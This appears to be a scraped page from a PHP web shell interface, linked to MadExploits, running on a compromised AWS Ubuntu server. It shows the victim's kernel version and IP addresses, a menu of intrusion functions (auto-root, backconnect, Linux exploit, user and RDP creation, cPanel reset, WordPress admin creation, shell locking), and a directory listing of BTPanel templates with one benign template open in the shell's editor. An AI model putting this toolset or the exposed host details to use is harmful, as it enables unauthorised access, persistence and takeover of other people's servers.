Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.17.142.93
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
BTPanel /
templates /
default /
[ HOME SHELL ]
Name
Size
Permission
Action
autherr.html
14.66
KB
-rwxr-xr-x
close.html
329
B
-rwxr-xr-x
config.html
27.09
KB
-rwxr-xr-x
control.html
15.72
KB
-rwxr-xr-x
crontab.html
4.08
KB
-rwxr-xr-x
database.html
6.76
KB
-rwxr-xr-x
docker.html
14.83
KB
-rwxr-xr-x
down.html
128.08
KB
-rwxr-xr-x
error.html
152
B
-rwxr-xr-x
error2.html
6.13
KB
-rwxr-xr-x
error3.html
7.74
KB
-rwxr-xr-x
files.html
24.26
KB
-rwxr-xr-x
files_test.html
4.81
KB
-rwxr-xr-x
firewall.html
24.12
KB
-rwxr-xr-x
firewall_new.html
14.68
KB
-rwxr-xr-x
ftp.html
12.65
KB
-rwxr-xr-x
index.html
13.88
KB
-rwxr-xr-x
index_new.html
3.88
KB
-rwxr-xr-x
install.html
2.35
KB
-rwxr-xr-x
layout.html
36.73
KB
-rwxr-xr-x
license.html
19.63
KB
-rwxr-xr-x
login.html
74.73
KB
-rwxr-xr-x
logs.html
22.37
KB
-rwxr-xr-x
modify_password.html
2.74
KB
-rwxr-xr-x
movie.html
131
B
-rwxr-xr-x
panel_error.html
1.02
KB
-rwxr-xr-x
plugin_error.html
1.45
KB
-rwxr-xr-x
site.html
4.15
KB
-rwxr-xr-x
soft.html
3.57
KB
-rwxr-xr-x
tips.html
56.32
KB
-rwxr-xr-x
unsubscribe.html
7.73
KB
-rwxr-xr-x
xterm.html
6.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : files_test.html
{% extends "layout.html" %} {% block content %} <div class="main-content"> <div class="container-fluid" style="padding-bottom:50px"> <div class="file-box bgw mtb15" style="position:relative; padding-top:110px"> <div id="tipTools" class="plr15"> <div class="ptb15"> <div class="clearfix"> <div class="pull-left"> <button id="backBtn" class="backBtn btn btn-default btn-sm glyphicon glyphicon-arrow-left pull-left" title="{{data['lan']['BTN1']}}" onClick="BackDir()"></button> <button class="backBtn refreshBtn btn btn-default btn-sm glyphicon glyphicon-refresh pull-right" title="{{data['lan']['BTN2']}}" style="margin-left:-1px;"></button> <span id='DirPathPlace' class="pull-left"><input id="fileInputPath" type="text"></span> <span id='PathPlaceBtn' class="pull-left"></span> </div> <div class="pull-left mlr15" style="line-height:26px"><span id='DirInfo'></span></div> <div class="search pull-right" style="position: absolute; top: 6px; right: 5px;"> <form target="hid" onsubmit='GetFiles(1)'> <input type="text" id="SearchValue" class="ser-text pull-left" placeholder="" /> <button type="button" class="ser-sub pull-left" onclick='GetFiles(1)'></button> </form> <iframe name='hid' id="hid" style="display:none"></iframe> </div> </div> </div> <div class="clearfix ptb10"> <button class="btn btn-default btn-sm pull-left" onclick="UploadFiles()">{{data['lan']['BTN3']}}</button> <button class="btn btn-default btn-sm pull-left" onclick="DownloadFile()" title="{{data['lan']['TI1']}}" style="margin:0 5px">{{data['lan']['BTN4']}}</button> <span id='BarTools'></span> <span id='Batch' style="background-color:#fff;position:absolute;right:190px;z-index:10"></span> <span id='comlist' class="comlist"></span> <div class="btn-group btn-group-sm pull-right" style="margin-right:5px;"> <button id="set_icon" title="{{data['lan']['TI2']}}" type="button" class="btn btn-default"> <i class="glyphicon glyphicon-th"></i> </button> <button id="set_list" title="{{data['lan']['TI3']}}" type="button" class="btn btn-default active"> <i class="glyphicon glyphicon-th-list"></i> </button> </div> </div> </div> <div class="divtable pd15" id="fileCon"></div> <div class="dataTables_paginate paging_bootstrap pagination plr15" style="position: relative; top: -15px;"> <ul id="filePage" class="page"></ul> </div> </div> </div> </div> <ul id="rmenu" class="dropdown-menu" style="display:none"> <li onclick="javascript:Batch(1);"><a style="cursor: pointer;">{{data['lan']['L1']}}</a></li> <li onclick="javascript:Batch(2);"><a style="cursor: pointer;">{{data['lan']['L2']}}</a></li> <li onclick="javascript:Batch(5);"><a style="cursor: pointer;">{{data['lan']['L3']}}</a></li> <li onclick="javascript:Batch(3);"><a style="cursor: pointer;">{{data['lan']['L4']}}</a></li> <li onclick="javascript:Batch(4);"><a style="cursor: pointer;">{{data['lan']['L5']}}</a></li> </ul> {% endblock %} {% block scripts %} <script src="/static/js/jquery-ui.min.js"></script> <script src="/static/js/jquery.contextify.min.js"></script> <script src="/static/js/files.js?date={{g.version}}"></script> <script src="/static/js/upload.js?date={{g.version}}"></script> <script type="text/javascript"> // setTimeout(function(){ // GetDisk(); // },500); // var xPath = getCookie('Path'); // setTimeout(function(){ // GetFiles((xPath!=undefined?xPath:'/www/wwwroot')); // },800); // // PathPlaceBtn((xPath!=undefined?xPath:'/www/wwwroot')); // setCookie('uploadSize',1024 * 1024 * 1024); // if(getCookie('rank') == undefined || getCookie('rank') == null){ // setCookie('rank','a'); // } // $("#set_icon").click(function(){ // setCookie('rank','b'); // $(this).addClass("active"); // $("#set_list").removeClass("active"); // GetFiles(getCookie('Path')); // }); // $("#set_list").click(function(){ // setCookie('rank','a'); // $(this).addClass("active"); // $("#set_icon").removeClass("active"); // GetFiles(getCookie('Path')); // }) // $(".refreshBtn").click(function(){ // GetFiles(getCookie('Path')); // }) // var files = { } </script> {% endblock %}
Close